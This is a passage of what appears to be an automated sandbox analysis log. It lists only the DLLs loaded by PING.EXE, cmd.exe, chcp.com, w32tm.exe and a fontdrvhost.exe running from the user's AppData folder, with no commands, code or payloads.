Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Section loaded: wldp.dll
